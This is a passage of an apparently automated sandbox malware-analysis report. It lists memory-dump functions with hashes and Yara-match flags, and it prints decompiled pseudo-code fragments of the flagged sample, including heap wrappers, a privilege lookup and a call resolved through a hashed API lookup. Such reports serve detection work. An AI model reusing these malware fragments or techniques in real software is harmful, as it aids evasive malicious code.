                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ab45ba730c31f6730565f6361b3b5bc5a15cc66223aa17b94cc4d591747a1440
                                                            • Instruction ID: 4935cff62c0d82f4e51dbd3bce572dc85b56fb538f9ac060f89cef0604d00e2e
                                                            • Opcode Fuzzy Hash: ab45ba730c31f6730565f6361b3b5bc5a15cc66223aa17b94cc4d591747a1440
                                                            • Instruction Fuzzy Hash: B59002B520101402D544719944087460405A7D1345F51C421A5054554EC6998DE976A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1268d9a620011ef2b6355f517d64872cfec363137e1fc995458878ec4bfab17e
                                                            • Instruction ID: d2ff1311c5012e7e5124ed1e515783ed012ebbb8b9c0029d0c961e5b377699c6
                                                            • Opcode Fuzzy Hash: 1268d9a620011ef2b6355f517d64872cfec363137e1fc995458878ec4bfab17e
                                                            • Instruction Fuzzy Hash: C2900269211010034509A59907085070446A7D6395351C431F1005550CD66188756161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8e238b7b305a7d27610656a67559fc5053596cb7487b0d723fa28590ac2d97a7
                                                            • Instruction ID: c9471c65e6e8de01020d064b801053794dc4009ec935e558bd2104258e15336a
                                                            • Opcode Fuzzy Hash: 8e238b7b305a7d27610656a67559fc5053596cb7487b0d723fa28590ac2d97a7
                                                            • Instruction Fuzzy Hash: B09002A534101442D50461994418B060405E7E2345F51C425E1054554DC659CC667166
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4aed993f579bbef05ae86ac073da23a825a2158fb813128a00732a68537d4d8b
                                                            • Instruction ID: 5ced99b8795b7791aa4775b72501d7ed1f61858d68bc2f6bd04966312a08aa84
                                                            • Opcode Fuzzy Hash: 4aed993f579bbef05ae86ac073da23a825a2158fb813128a00732a68537d4d8b
                                                            • Instruction Fuzzy Hash: 119002A520201003850971994418616440AA7E1345B51C431E1004590DC56588A57165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9e8cd7e671dada42f699ebf01746dac9fce5b2867d479b45a68595a1e9d00b6e
                                                            • Instruction ID: ecf3e0788161dce5c1d54887323297376642b264a466029f50d11e28135d75bd
                                                            • Opcode Fuzzy Hash: 9e8cd7e671dada42f699ebf01746dac9fce5b2867d479b45a68595a1e9d00b6e
                                                            • Instruction Fuzzy Hash: D690027520101413D515619945087070409A7D1385F91C822A0414558DD6968966B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b43e966779c4978ef7e6a3097ccf941a5adaf7749c10b162a7de40974ca04ff8
                                                            • Instruction ID: da4f58e1cb56ed39cfb257d3e26916432b76b5695d0d00ae007912033f8ef272
                                                            • Opcode Fuzzy Hash: b43e966779c4978ef7e6a3097ccf941a5adaf7749c10b162a7de40974ca04ff8
                                                            • Instruction Fuzzy Hash: B9900265242051529949B19944085074406B7E1385791C422A1404950CC566986AE661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bb265aeaac6c69a3be3d43aee3b85a3b96c9560c42e539d8015657b00b813be2
                                                            • Instruction ID: 770f924125ce15a41c92fffb5d3af0c94e85fd906fd83fc06f68f4384783e142
                                                            • Opcode Fuzzy Hash: bb265aeaac6c69a3be3d43aee3b85a3b96c9560c42e539d8015657b00b813be2
                                                            • Instruction Fuzzy Hash: 0790026560101502D50571994408616040AA7D1385F91C432A1014555ECA6589A6B171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 781efb220e11c4440a0dbbf00eb5cc57ec73f8872ed9625f1c96c8ce856f8a76
                                                            • Instruction ID: 50783b5418e46876434d1b56449dfbbf83d5b8a342ae0e0bb01ff8fb360e0f01
                                                            • Opcode Fuzzy Hash: 781efb220e11c4440a0dbbf00eb5cc57ec73f8872ed9625f1c96c8ce856f8a76
                                                            • Instruction Fuzzy Hash: 1890027520101402D50465D9540C6460405A7E1345F51D421A5014555EC6A588A57171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d82197ad8ddcef329342bcc0e2c2d88023282c850eb06103ae29ca16ea3835fc
                                                            • Instruction ID: 609e1568ce0a2cedff4256c9c1cb17e40a344e1b1a881603840df8ef429e3a8a
                                                            • Opcode Fuzzy Hash: d82197ad8ddcef329342bcc0e2c2d88023282c850eb06103ae29ca16ea3835fc
                                                            • Instruction Fuzzy Hash: 0E90026530101003D5447199541C6064405F7E2345F51D421E0404554CD955886A6262
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0a1ff2301e0154ab56922d3c15fa419b2785f8c8ad48b408f5603a8903aa3735
                                                            • Instruction ID: 0f8db3cdaecb84cda6a2991bb57641b8617a19b83743b9fc5247ddf976638637
                                                            • Opcode Fuzzy Hash: 0a1ff2301e0154ab56922d3c15fa419b2785f8c8ad48b408f5603a8903aa3735
                                                            • Instruction Fuzzy Hash: 4490026D21301002D5847199540C60A0405A7D2346F91D825A0005558CC955887D6361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bdef3ba1d55ff5cb334661d08aa6d76b7cda4a9176af07e4136585b1f41044c6
                                                            • Instruction ID: 76b3d1ec92602afa6cc31e2d3024451f7bb3871937814d0e2c1cfb9865b68fc5
                                                            • Opcode Fuzzy Hash: bdef3ba1d55ff5cb334661d08aa6d76b7cda4a9176af07e4136585b1f41044c6
                                                            • Instruction Fuzzy Hash: 5690027531115402D514619984087060405A7D2345F51C821A0814558DC6D588A57162
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bb92479ac3519fcc902f1095b50a700f16586d8eb5fa863f727639a93febff98
                                                            • Instruction ID: f7fbc8b2e56b04014338f5246fd7812deed6cf5b1d3d680267d15a836d4f61ad
                                                            • Opcode Fuzzy Hash: bb92479ac3519fcc902f1095b50a700f16586d8eb5fa863f727639a93febff98
                                                            • Instruction Fuzzy Hash: 9B90026560101042854471A988489064405BBE2355751C531A0988550DC599887966A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 27cca0cdf5b2e5f71c3452811acad3e94db56f8f641ed07cdc9c13a8f81d275c
                                                            • Instruction ID: 10d58bfe2a335f36574a22a6bf7f1ed556a5bb44e3a020be838e1c251337b78a
                                                            • Opcode Fuzzy Hash: 27cca0cdf5b2e5f71c3452811acad3e94db56f8f641ed07cdc9c13a8f81d275c
                                                            • Instruction Fuzzy Hash: 7C90027520141402D5046199481870B0405A7D1346F51C421A1154555DC665886575B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3809fa3a08659f36797bad978c2bdc5a5b3feefc11f922c2f9af2199c50c57ce
                                                            • Instruction ID: f1aaae4b251fd128faa08e02ddf29b3756141bda1435a690caa38b0067dff4d2
                                                            • Opcode Fuzzy Hash: 3809fa3a08659f36797bad978c2bdc5a5b3feefc11f922c2f9af2199c50c57ce
                                                            • Instruction Fuzzy Hash: 3A90027520101802D5847199440864A0405A7D2345F91C425A0015654DCA558A6D77E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 108b334eda297416109b666c3af08ed069c1af36a79b0e3160c27d5bd35484f7
                                                            • Instruction ID: 640d80eab98b7a5b4424fdae78683efac084a6d2020a9ad3ea913f4d5d49ded2
                                                            • Opcode Fuzzy Hash: 108b334eda297416109b666c3af08ed069c1af36a79b0e3160c27d5bd35484f7
                                                            • Instruction Fuzzy Hash: 7590026521181042D60465A94C18B070405A7D1347F51C525A0144554CC95588756561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 2d71ec65ce84dca68444f1c874d65a96381d7642b89c0b117ba5dade106ae539
                                                            • Instruction ID: 1969cbcc8e18bb81fb26a6ad11b84510f144fe977bdf5a56f09e86b686002dee
                                                            • Opcode Fuzzy Hash: 2d71ec65ce84dca68444f1c874d65a96381d7642b89c0b117ba5dade106ae539
                                                            • Instruction Fuzzy Hash: 8490027520109802D5146199840874A0405A7D1345F55C821A4414658DC6D588A57161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                            • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                            • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                            • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004188F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: %mA
                                                            • API String ID: 3298025750-273627637
                                                            • Opcode ID: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                                            • Instruction ID: ff75906eec445189a7608ef16a07370f9ba81c6555a21011093ab971dc24f262
                                                            • Opcode Fuzzy Hash: ef9b155757f3e1fbe39276f7fd5c833905d4bea5a6ec4ef061b902a9c0f44d4d
                                                            • Instruction Fuzzy Hash: 56F0BEB82082856BEB00EF689CC08AB7794BF80318710895EFC4947243D634D95987A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E004188C0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _t10;
				void* _t12;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t12 =  *_t6;
				_push(_a16);
				_push(_a12);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}






                                                            0x004188d7
                                                            0x004188e2
                                                            0x004188e2
                                                            0x004188e8
                                                            0x004188eb
                                                            0x004188ed
                                                            0x004188f1

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID: F5A
                                                            • API String ID: 1279760036-683449296
                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                            • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                            • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004188FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID: F5A
                                                            • API String ID: 1279760036-683449296
                                                            • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                            • Instruction ID: 25b7ab50de32ca0460f32ce6d2cc7201fc87e64a3a46fad92a8330604ac2ee33
                                                            • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                            • Instruction Fuzzy Hash: B6A022B3B20088000020B3F23C083EAE20C80C33BB2200CEFC00C30003888BC088322E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E00407290(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B50(__ebx, __edi, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E004092B0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                            0x00407290
                                                            0x0040729f
                                                            0x004072a3
                                                            0x004072ae
                                                            0x004072ba
                                                            0x004072be
                                                            0x004072ce
                                                            0x004072d3
                                                            0x004072da
                                                            0x004072dc
                                                            0x004072dd
                                                            0x004072ea
                                                            0x004072ec
                                                            0x004072ee
                                                            0x0040730b
                                                            0x0040730b
                                                            0x00000000
                                                            0x0040730d
                                                            0x00407312

                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                            • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                            • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                            • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 30%
                                                            			E00418900(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
				char _t15;
				void* _t22;

				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
				E004191F0(_t22);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}





                                                            0x00418905
                                                            0x00418914
                                                            0x00418917
                                                            0x0041892d
                                                            0x00418931

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                            • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                            • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                            0x00418a7a
                                                            0x00418a90
                                                            0x00418a94

                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                            • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                            • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                            0x00418943
                                                            0x0041895a
                                                            0x00418968

                                                            APIs
                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                            • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                            • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0130967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 87bc257be6869c6e75247f8f71785c2d832cf8b870735d2748443ebee3dc4fe8
                                                            • Instruction ID: 03f95bed409d2391035d7022dfed3e44ee075b89d0461e7556e859117b60b546
                                                            • Opcode Fuzzy Hash: 87bc257be6869c6e75247f8f71785c2d832cf8b870735d2748443ebee3dc4fe8
                                                            • Instruction Fuzzy Hash: ABB02B718010C4C6DA02D3A00A0C7173D0077C0318F12C061D1020240F8338C090F2B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0137B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0137B476
                                                            • This failed because of error %Ix., xrefs: 0137B446
                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0137B3D6
                                                            • The instruction at %p referenced memory at %p., xrefs: 0137B432
                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0137B47D
                                                            • an invalid address, %p, xrefs: 0137B4CF
                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0137B48F
                                                            • *** Inpage error in %ws:%s, xrefs: 0137B418
                                                            • Go determine why that thread has not released the critical section., xrefs: 0137B3C5
                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0137B53F
                                                            • read from, xrefs: 0137B4AD, 0137B4B2
                                                            • *** enter .exr %p for the exception record, xrefs: 0137B4F1
                                                            • write to, xrefs: 0137B4A6
                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0137B314
                                                            • The resource is owned exclusively by thread %p, xrefs: 0137B374
                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0137B352
                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0137B323
                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0137B2DC
                                                            • The resource is owned shared by %d threads, xrefs: 0137B37E
                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0137B484
                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0137B305
                                                            • *** then kb to get the faulting stack, xrefs: 0137B51C
                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0137B38F
                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0137B39B
                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0137B2F3
                                                            • The instruction at %p tried to %s , xrefs: 0137B4B6
                                                            • *** enter .cxr %p for the context, xrefs: 0137B50D
                                                            • The critical section is owned by thread %p., xrefs: 0137B3B9
                                                            • a NULL pointer, xrefs: 0137B4E0
                                                            • <unknown>, xrefs: 0137B27E, 0137B2D1, 0137B350, 0137B399, 0137B417, 0137B48E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
